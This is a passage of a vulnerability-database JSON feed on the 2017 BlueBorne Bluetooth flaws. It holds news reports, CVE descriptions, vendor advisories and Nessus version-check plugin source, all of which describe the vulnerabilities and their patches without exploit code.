Microsoft, Linux and iOS. They include:\n\n*Linux kernel RCE vulnerability \u2013 CVE-2017-1000251\n\n*Linux Bluetooth stack (BlueZ) information leak vulnerability \u2013 CVE-2017-1000250\n\n*Android information leak vulnerability \u2013 CVE-2017-0785\n\n*Android RCE vulnerabilities CVE-2017-0781 & CVE-2017-0782\n\n*The Bluetooth Pineapple in Android \u2013 Logical Flaw CVE-2017-0783\n\n*The Bluetooth Pineapple in Windows \u2013 Logical Flaw CVE-2017-8628\n\n*Apple Low Energy Audio Protocol RCE vulnerability \u2013 CVE Pending\n\nAn attack scenario includes an adversary identifying Bluetooth devices nearby and using commonly tools to identify the MAC address of vulnerable Bluetooth devices.\n\n\u201cBy probing the device, the attacker can determine which operating system his victim is using, and adjust his exploit accordingly. The attacker will then exploit a vulnerability in the implementation of the Bluetooth protocol in the relevant platform and gain the access he needs to act on his malicious objective,\u201d researchers wrote.\n\nAt this stage the attacker can choose to create a Man-in-the-Middle attack and control the device\u2019s communication, or take full control over the device and use it for a wide array of cybercriminal purposes, researchers stated.\n\nIn order to traverse from one Bluetooth device to the next, researchers say attackers would take advantage of a feature called Bluetooth Mesh, introduced with Bluetooth 5, which allows Bluetooth devices to interconnect and form a larger network with a more elaborate and dense structure.\n\n\u201cThe automatic connectivity of Bluetooth, combined with the fact that nearly all devices have Bluetooth enabled by default, make these vulnerabilities all the more serious and pervasive,\u201d they said. \u201cOnce a device is infected with malware, it can then easily broadcast the malware to other Bluetooth-enable devices in its vicinity, either inside an office or in more public locations.\u201d\n\n\u201cThese silent attacks are invisible to traditional security controls and procedures. Companies don\u2019t monitor these types of device-to-device connections in their environment, so they can\u2019t see these attacks or stop them,\u201d said Yevgeny Dibrov, CEO of Armis. \u201cThe research illustrates the types of threats facing us in this new connected age.\u201d\n\nBlueBorne attack types boil down to two types. One, where an adversary goes undetected and targets a specific devices to execute code with the objective to gaining access corporate networks, systems, and data. The second scenario involves creating a Bluetooth Pineapple to sniff or redirect traffic.\n\n\u201cThese vulnerabilities are the most serious Bluetooth vulnerabilities identified to date. Previously identified flaws found in Bluetooth were primarily at the protocol level. These new vulnerabilities are at the implementation level, bypassing the various authentication mechanisms, and enabling a complete takeover of the target device,\u201d according to researchers.\n\n(_This story was updated Sept. 12, 1:30pm ET to include Microsoft\u2019s comments and CVE details._)\n", "modified": "2017-09-20T19:57:35", "published": "2017-09-12T09:00:09", "id": "THREATPOST:73E805ED92B364393EDD601647FE122D", "href": "https://threatpost.com/wireless-blueborne-attacks-target-billions-of-bluetooth-devices/127921/", "type": "threatpost", "title": "Wireless 'BlueBorne' Attacks Target Billions of Bluetooth Devices", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T09:17:55", "bulletinFamily": "info", "description": "[](<https://3.bp.blogspot.com/-UzPaOsWrdHE/WbgJXlIi7iI/AAAAAAAAAHg/YXxzWHRUcWcmye1sPmhjHm8FFq5DMTY6ACLcBGAs/s1600/Bluetooth-blueborn-hacking.png>)\n\nIf you are using a Bluetooth enabled device, be it a smartphone, laptop, smart TV or any other IoT device, you are at risk of malware attacks that can carry out remotely to take over your device even without requiring any interaction from your side. \n \nSecurity researchers have just [discovered](<https://www.armis.com/blueborne/>) total 8 zero-day vulnerabilities in Bluetooth protocol that impact more than 5.3 Billion devices\u2014from Android, iOS, Windows and Linux to the Internet of things (IoT) devices\u2014using the short-range wireless communication technology. \n \nUsing these vulnerabilities, security researchers at IoT security firm Armis have devised an attack, dubbed **BlueBorne**, which could allow attackers to completely take over Bluetooth-enabled devices, spread malware, or even establish a \"man-in-the-middle\" connection to gain access to devices' critical data and networks without requiring any victim interaction. \n \nAll an attacker need is for the victim's device to have Bluetooth turned on and obviously, in close proximity to the attacker's device. Moreover, successful exploitation doesn't even require vulnerable devices to be paired with the attacker's device. \n \n\n\n### BlueBorne: Wormable Bluetooth Attack\n\n[](<https://3.bp.blogspot.com/-fsl3agXN11E/WbgKQy6rBfI/AAAAAAAAAHs/pMGATx8opQEgq4thDgwxtknC7Q1IpZ1vACLcBGAs/s1600/bluetooth-hacking.png>)\n\nWhat's more worrisome is that the BlueBorne attack could spread like the wormable WannaCry ransomware that emerged earlier this year and wrecked havoc by disrupting large companies and organisations worldwide. \n \nBen Seri, head of research team at Armis Labs, claims that during an experiment in the lab, his team was able to create a botnet network and install ransomware using the BlueBorne attack. \n\n\nHowever, Seri believes that it is difficult for even a skilled attacker to create a universal wormable exploit that could find Bluetooth-enabled devices, target all platform together and spread automatically from one infected device to others. \n\n\n> \"Unfortunately, this set of capabilities is extremely desireable to a hacker. BlueBorne can serve any malicious objective, such as cyber espionage, data theft, ransomware, and even creating large botnets out of IoT devices like the Mirai Botnet or mobile devices as with the recent [WireX Botne](<https://thehackernews.com/2017/08/android-ddos-botnet.html>)t,\" Armis said. \n\"The BlueBorne attack vector surpasses the capabilities of most attack vectors by penetrating secure \"air-gapped\" networks which are disconnected from any other network, including the internet.\"\n\n \n\n\n### Apply Security Patches to Prevent Bluetooth Hacking\n\n \nThe security firm responsibly disclosed the vulnerabilities to all the major affected companies a few months ago\u2014including Google, Apple and Microsoft, Samsung and Linux Foundation. \n \nThese vulnerabilities include: \n \n\n\n * Information Leak Vulnerability in Android (CVE-2017-0785)\n * Remote Code Execution Vulnerability (CVE-2017-0781) in Android's Bluetooth Network Encapsulation Protocol (BNEP) service\n * Remote Code Execution Vulnerability (CVE-2017-0782) in Android BNEP's Personal Area Networking (PAN) profile\n * The Bluetooth Pineapple in Android\u2014Logical flaw (CVE-2017-0783)\n * Linux kernel Remote Code Execution vulnerability (CVE-2017-1000251)\n * Linux Bluetooth stack (BlueZ) information leak vulnerability (CVE-2017-1000250)\n * The Bluetooth Pineapple in Windows\u2014Logical flaw (CVE-2017-8628)\n * Apple Low Energy Audio Protocol Remote Code Execution vulnerability (CVE Pending)\nGoogle and Microsoft have already made security patches available to their customers, while Apple iOS devices running the most recent version of its mobile operating system (that is 10.x) are safe. \n\n\n> \u201cMicrosoft released security updates in July and customers who have Windows Update enabled and applied the security updates, are protected automatically. We updated to protect customers as soon as possible, but as a responsible industry partner, we withheld disclosure until other vendors could develop and release updates.\u201d \u2013 a Microsoft spokesperson said.\n\n**What's worst? **All iOS devices with 9.3.5 or older versions and over 1.1 Billion active Android devices running older than Marshmallow (6.x) are vulnerable to the BlueBorne attack. \n \nMoreover, millions of smart Bluetooth devices running a version of Linux are also vulnerable to the attack. Commercial and consumer-oriented Linux platform (Tizen OS), BlueZ and 3.3-rc1 are also vulnerable to at least one of the BlueBorne bugs. \n \nAndroid users need to wait for security patches for their devices, as it depends on your device manufacturers. \n \nIn the meantime, they can install \"[BlueBorne Vulnerability Scanner](<https://play.google.com/store/apps/details?id=com.armis.blueborne_detector>)\" app (created by Armis team) from Google Play Store to check if their devices are vulnerable to BlueBorne attack or not. If found vulnerable, you are advised to turn off Bluetooth on your device when not in use.\n", "modified": "2017-09-12T17:53:59", "published": "2017-09-12T05:52:00", "id": "THN:649BE2C710B04C213ECB85D95D5F229A", "href": "https://thehackernews.com/2017/09/blueborne-bluetooth-hacking.html", "type": "thn", "title": "BlueBorne: Critical Bluetooth Attack Puts Billions of Devices at Risk of Hacking", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:06:57", "bulletinFamily": "info", "description": "[](<https://3.bp.blogspot.com/-o2j3I7E5YEc/Wg1NXN0UwCI/AAAAAAAAuwo/OdiSuaq6xcAqy96SVehGkhc_VYMGX7gfgCLcBGAs/s1600/amazon-alexa-hacking-bluetooth.png>)\n\nRemember BlueBorne? \n \nA series of recently disclosed [critical Bluetooth flaws](<https://thehackernews.com/2017/09/blueborne-bluetooth-hacking.html>) that affect billions of Android, iOS, Windows and Linux devices have now been discovered in millions of AI-based voice-activated personal assistants, including **Google Home** and **Amazon Echo**. \n \nAs estimated during the discovery of this devastating threat, several IoT and smart devices whose operating systems are often updated less frequently than smartphones and desktops are also vulnerable to BlueBorne. \n \nBlueBorne is the name given to the sophisticated attack exploiting a total of eight Bluetooth implementation vulnerabilities that allow attackers within the range of the targeted devices to run malicious code, steal sensitive information, take complete control, and launch man-in-the-middle attacks. \n \n**What's worse? **Triggering the [BlueBorne exploit](<https://thehackernews.com/2017/09/blueborne-bluetooth-hacking.html>) doesn't require victims to click any link or open any file\u2014all without requiring user interaction. Also, most security products would likely not be able to detect the attack. \n \nWhat's even scarier is that once an attacker gains control of one Bluetooth-enabled device, he/she can infect any or all devices on the same network. \n \nThese Bluetooth vulnerabilities were patched by Google for Android in September, [Microsoft for Windows](<https://thehackernews.com/2017/09/windows-zero-day-spyware.html>) in July, Apple for iOS one year before disclosure, and Linux distributions also shortly after disclosure. \n \nHowever, many of these 5 billion devices are still unpatched and open to attacks via these flaws. \n \n\n\n### 20 Million Amazon Echo & Google Home Devices Vulnerable to BlueBorne Attacks\n\nIoT security firm Armis, who initially discovered this issue, has now [disclosed](<https://www.armis.com/blueborne-cyber-threat-impacts-amazon-echo-google-home/>) that an estimated 20 million Amazon Echo and Google Home devices are also vulnerable to attacks leveraging the BlueBorne vulnerabilities. \n \nIf I split, around 15 million Amazon Echo and 5 million Google Home devices sold across the world are potentially at risk from BlueBorne. \n \nAmazon Echo is affected by the following two vulnerabilities: \n\n\n * A remote code execution vulnerability in the Linux kernel (CVE-2017-1000251)\n * An information disclosure flaw in the SDP server (CVE-2017-1000250)\nSince different Echo's variants use different operating systems, other Echo devices are affected by either the vulnerabilities found in Linux or Android. \n \nWhereas, Google Home devices are affected by one vulnerability: \n\n\n * Information disclosure vulnerability in Android's Bluetooth stack (CVE-2017-0785)\nThis Android flaw can also be exploited to cause a denial-of-service (DoS) condition. \n \nSince Bluetooth cannot be disabled on either of the voice-activated personal assistants, attackers within the range of the affected device can easily launch an attack. \n \nArmis has also published a proof-of-concept (PoC) video showing how they were able to hack and manipulate an Amazon Echo device. \n \nThe security firm notified both Amazon and Google about its findings, and both companies have released patches and issued automatic updates for the Amazon Echo and Google Home that fixes the BlueBorne attacks. \n \nAmazon Echo customers should confirm that their device is running v591448720 or later, while Google has not made any information regarding its version yet.\n", "modified": "2017-11-16T08:43:47", "published": "2017-11-15T21:43:00", "id": "THN:4141386ABD9B9D1290E4A6EAD271B02B", "href": "https://thehackernews.com/2017/11/amazon-alexa-hacking-bluetooth.html", "type": "thn", "title": "Bluetooth Hack Affects 20 Million Amazon Echo and Google Home Devices", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2019-05-29T18:16:49", "bulletinFamily": "NVD", "description": "In Apple iOS 7 through 9, due to a BlueBorne flaw in the implementation of LEAP (Low Energy Audio Protocol), a large audio command can be sent to a targeted device and lead to a heap overflow with attacker-controlled data. Since the audio commands sent via LEAP are not properly validated, an attacker can use this overflow to gain full control of the device through the relatively high privileges of the Bluetooth stack in iOS. The attack bypasses Bluetooth access control; however, the default \"Bluetooth On\" value must be present in Settings.", "modified": "2019-05-14T16:29:00", "id": "CVE-2017-14315", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14315", "published": "2017-09-12T15:29:00", "title": "CVE-2017-14315", "type": "cve", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:16:46", "bulletinFamily": "NVD", "description": "All versions of the SDP server in BlueZ 5.46 and earlier are vulnerable to an information disclosure vulnerability which allows remote attackers to obtain sensitive information from the bluetoothd process memory. This vulnerability lies in the processing of SDP search attribute requests.", "modified": "2018-02-17T02:29:00", "id": "CVE-2017-1000250", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000250", "published": "2017-09-12T17:29:00", "title": "CVE-2017-1000250", "type": "cve", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:17:11", "bulletinFamily": "NVD", "description": "Microsoft Bluetooth Driver in Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703 allows a spoofing vulnerability due to Microsoft's implementation of the Bluetooth stack, aka \"Microsoft Bluetooth Driver Spoofing Vulnerability\".", "modified": "2017-09-21T18:21:00", "id": "CVE-2017-8628", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8628", "published": "2017-09-13T01:29:00", "title": "CVE-2017-8628", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:A/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:16:46", "bulletinFamily": "NVD", "description": "The native Bluetooth stack in the Linux Kernel (BlueZ), starting at the Linux kernel version 2.6.32 and up to and including 4.13.1, are vulnerable to a stack overflow vulnerability in the processing of L2CAP configuration responses resulting in Remote code execution in kernel space.", "modified": "2018-02-17T02:29:00", "id": "CVE-2017-1000251", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000251", "published": "2017-09-12T17:29:00", "title": "CVE-2017-1000251", "type": "cve", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:16:45", "bulletinFamily": "NVD", "description": "A information disclosure vulnerability in the Android system (bluetooth). Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-63146698.", "modified": "2018-07-28T01:29:00", "id": "CVE-2017-0785", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0785", "published": "2017-09-14T19:29:00", "title": "CVE-2017-0785", "type": "cve", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:16:45", "bulletinFamily": "NVD", "description": "A information disclosure vulnerability in the Android system (bluetooth). Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-63145701.", "modified": "2018-01-18T18:18:00", "id": "CVE-2017-0783", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0783", "published": "2017-09-14T19:29:00", "title": "CVE-2017-0783", "type": "cve", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T18:16:45", "bulletinFamily": "NVD", "description": "A remote code execution vulnerability in the Android system (bluetooth). Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-63146237.", "modified": "2018-01-18T18:18:00", "id": "CVE-2017-0782", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0782", "published": "2017-09-14T19:29:00", "title": "CVE-2017-0782", "type": "cve", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:16:45", "bulletinFamily": "NVD", "description": "A remote code execution vulnerability in the Android system (bluetooth). Product: Android. Versions: 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-63146105.", "modified": "2018-04-09T01:29:00", "id": "CVE-2017-0781", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0781", "published": "2017-09-14T19:29:00", "title": "CVE-2017-0781", "type": "cve", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2019-02-01T18:01:18", "bulletinFamily": "software", "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "modified": "2017-12-20T00:00:00", "published": "2017-10-18T00:00:00", "id": "HUAWEI-SA-20171018-01-BLUEBORNE", "href": "https://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20171018-01-blueborne-en", "title": "Security Advisory \u2013 Multiple \u201cBlueBorne\u201d vulnerabilities on Huawei Products", "type": "huawei", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "f5": [{"lastseen": "2019-05-09T00:21:29", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | CVSSv3 score | Vulnerable component or feature \n---|---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP AAM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable | None | None \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable | None | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None | None \nBIG-IP Edge Gateway | None | 11.2.1 | Not vulnerable | None | None \nBIG-IP GTM | None | 11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 \n11.2.1 | Not vulnerable | None | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.5.1 - 11.6.2 | Not vulnerable | None | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable | None | None \nF5 WebSafe | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.2 | Not vulnerable | None | None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 | Not vulnerable | None | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None | None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-10-27T21:03:00", "published": "2017-10-27T21:03:00", "id": "F5:K63131370", "href": "https://support.f5.com/csp/article/K63131370", "title": "Linux kernel vulnerability CVE-2017-1000251", "type": "f5", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2018-03-14T22:41:03", "bulletinFamily": "software", "description": "### Description\n\nMicrosoft Windows is prone to a security vulnerability that may allow attackers to conduct spoofing attacks. An attacker can exploit this issue to conduct spoofing attacks and perform unauthorized actions; other attacks are also possible.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't required. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-09-12T00:00:00", "published": "2017-09-12T00:00:00", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/100744", "id": "SMNTC-100744", "title": "Microsoft Windows Bluetooth Driver CVE-2017-8628 Man in the Middle Spoofing Vulnerability", "type": "symantec", "cvss": {"score": 4.3, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2019-02-21T01:32:56", "bulletinFamily": "scanner", "description": "According to its banner, the remote Apple TV device is a version equal or prior to 7.2.2. It is, therefore, affected by a remote code execution vulnerability. A flaw exists related to the BlueTooth subsystem that could allow remote code execution in the context of the privileged Bluetooth service. This issue is also known as 'BlueBorne'.", "modified": "2018-12-14T00:00:00", "id": "APPLETV_BLUEBORNE.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=103223", "published": "2017-09-14T00:00:00", "title": "Apple TV <= 7.2.2 Bluetooth Remote Code Execution (BlueBorne)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103223);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/12/14 14:58:47\");\n\n script_cve_id(\"CVE-2017-14315\");\n\n script_name(english:\"Apple TV <= 7.2.2 Bluetooth Remote Code Execution (BlueBorne)\");\n script_summary(english:\"Checks the version in the banner.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the remote Apple TV device is a version equal\nor prior to 7.2.2. It is, therefore, affected by a remote code execution\nvulnerability. A flaw exists related to the BlueTooth subsystem that\ncould allow remote code execution in the context of the privileged Bluetooth\nservice. This issue is also known as 'BlueBorne'.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.armis.com/blueborne/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to a 4th Generation Apple TV device running tvOS 9.0 or higher.\nThere is currently no fix available for 1st, 2nd or 3rd generation Apple TV devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-14315\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\nfixed_build = \"13T396\";\ntvos_ver = '9.0';\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : make_list(1, 2, 3, 4),\n model : model,\n gen : gen,\n fix_tvos_ver : tvos_ver,\n port : port,\n url : url,\n severity : SECURITY_HOLE\n);\n", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:44:16", "bulletinFamily": "scanner", "description": "An update for bluez is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe bluez packages contain the following utilities for use in Bluetooth applications: hcitool, hciattach, hciconfig, bluetoothd, l2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es) :\n\n* An information-disclosure flaw was found in the bluetoothd implementation of the Service Discovery Protocol (SDP). A specially crafted Bluetooth device could, without prior pairing or user interaction, retrieve portions of the bluetoothd process memory, including potentially sensitive information such as Bluetooth encryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\n\nNote that Tenable Network Security has attempted to extract the preceding description block directly from the corresponding Red Hat security advisory. Virtuozzo provides no description for VZLSA advisories. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-27T00:00:00", "id": "VIRTUOZZO_VZLSA-2017-2685.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119224", "published": "2018-11-27T00:00:00", "title": "Virtuozzo 6 : bluez / bluez-alsa / bluez-compat / bluez-cups / etc (VZLSA-2017-2685)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119224);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/11/27 13:31:29\");\n\n script_cve_id(\n \"CVE-2017-1000250\"\n );\n\n script_name(english:\"Virtuozzo 6 : bluez / bluez-alsa / bluez-compat / bluez-cups / etc (VZLSA-2017-2685)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for bluez is now available for Red Hat Enterprise Linux 6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe bluez packages contain the following utilities for use in\nBluetooth applications: hcitool, hciattach, hciconfig, bluetoothd,\nl2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es) :\n\n* An information-disclosure flaw was found in the bluetoothd\nimplementation of the Service Discovery Protocol (SDP). A specially\ncrafted Bluetooth device could, without prior pairing or user\ninteraction, retrieve portions of the bluetoothd process memory,\nincluding potentially sensitive information such as Bluetooth\nencryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has 